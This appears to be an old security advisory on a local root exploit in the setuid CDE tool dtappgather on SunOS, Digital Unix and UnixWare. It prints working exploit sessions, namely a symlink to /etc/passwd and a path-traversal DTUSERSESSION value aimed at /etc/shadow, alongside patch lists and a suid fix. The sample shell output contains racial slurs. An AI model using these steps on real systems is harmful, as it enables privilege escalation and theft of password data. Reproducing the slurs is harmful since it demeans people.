

    SunOS 5.5 & 5.5.1 running CDE version 1.0.2, DU 4.0X, Unixware7


    Mastoras found following.  Local users can change the ownership of
    any  file,  thus  gaining  root  priviledges. This happens because
    "dtappgather" does not check if the file:


    is a symbolic link and happily chown()s it to the user. When  CERT
    released advisory  CA-98.02 (see  CDE in  'mUNIXes' section) about
    /usr/dt/bin/dtappgather, Mastoras played a little with dtappgather
    and  discovered  the  problem  above,  but  he  thought that patch
    104498-02 corrects  it, as  described in  SUN's section  of 98.02.
    After  applying  the  patch,  it  was  still possible to gain root
    privs.   Following  exploit  was  initially  posted  to's
    security mailing list: "haxor".

	nigg0r@host% ls -l /etc/passwd
	-r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
	nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
	nigg0r@host% dtappgather
	MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
	nigg0r@host% ls -l /etc/passwd
	-r-xr-xr-x   1 nigg0r   niggers      1585 Dec 17 22:26 /etc/passwd
	nigg0r@host% echo "nigg0r wins! Fatality!" | mail root

    It  would  be  easy  to  find  the  exploit if you had read CERT's
    advisory.  The following steps were enough..

	% cp /usr/dt/bin/dtappgather .          [you can't "truss" suid proggies]
	% truss -o koko ./dtappgather
	% more koko
	[ shity ld things ]
	chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
	chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
	[ shitty things ]

    J.A. Gutierrez added  how the exploit  is much simpler  than that.

	$ id
	uid=6969(foo) gid=666(bar)
	$ ls -l /etc/shadow
	-r--------   1 root     sys          234 Nov  7  1999 /etc/shadow
	$ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
	$ ls -l /etc/shadow
	-r-xr-xr-x   1 foo      bar          234 Nov  7  1999 /etc/shadow

    However,  first  exploit  works  (at  least, on solaris 2.5), even
    after  patching  CDE  according  to  CERT  advisory.  UnixWare 7's
    dtappgather  even  today  runs  with  superuser  privileges,   but
    improperly  check  $DTUSERSESSION  to  ensure  that  the  file  is
    readable/writeable or owned by the user running it.

    For those of you using Digital Unix, here's info about them.   The
    patch in 4.0D patch kit 2  fixes the part of the bug  that changes
    the ownership of any file to the user running dtappgather, but  it
    does *NOT* fix the part  that changes the protection on  the file.
    For example, if  you try it  using /etc/passwd as  the target, the
    owner will stay the same  but the protection will change  from 644
    to 555.  This is still a problem, in that you can get read  access
    to any file on the system.  Same goes for patch kit 8 for 4.0B  as
    it behaves the same as the patched 4.0D dtappgather.


    SunOS    5.6    (or    CDE     1.2)    comes    with     directory
    /var/dt/appconfig/appmanager/  mode  755  so  it's not possible to
    make the  necessary link.  On the  other hand,  in SunOS 5.5* this
    dir  has  mode  777,  so  you  can  easily  make  the link or even
    unlink/rename  the  file  "generic-display-0"  if  exists owned by
    another user.  Quick Fix:

	chmod -s /usr/dt/bin/dtappgather

    This  is  fixed  in  Solaris  2.7  as  well  as with the following
    Solaris 2.x patches:

	CDE Version      Patch ID
	___________      _________
	1.2              106112-03
	1.2_x86          106113-03
	1.0.2            104661-07
	1.0.2_x86        104663-08
	1.0.1            104660-04
	1.0.1_x86        104662-05

    For /var/dt permissions, you need:

	103882-08: CDE 1.0.2: dtlogin patch for login authentication issues
	103884-06: CDE 1.0.1: dtlogin patch
	103885-06: CDE 1.0.1_x86: dtlogin patch
	103886-07: CDE 1.0.2_x86: dtlogin patch for login authentication issues

    This was fixed in 2.6, but  you still need to apply the  following
    for other problems:

	105703-07: CDE 1.2: dtlogin patch
	105704-07: CDE 1.2_x86: dtlogin patch

    The  problem  is  patched  with  both  the dtappgather and dtlogin
    patches to Solaris  2.5.1/2.6.  You need to apply both and restart

    Admins havin DU turn off the suid bit on dtappgather until you can
    a fix from Digital.

    Because SCO doesn't release source for UnixWare, we must wait  for
    them to provide one.  Basicly, same as DU.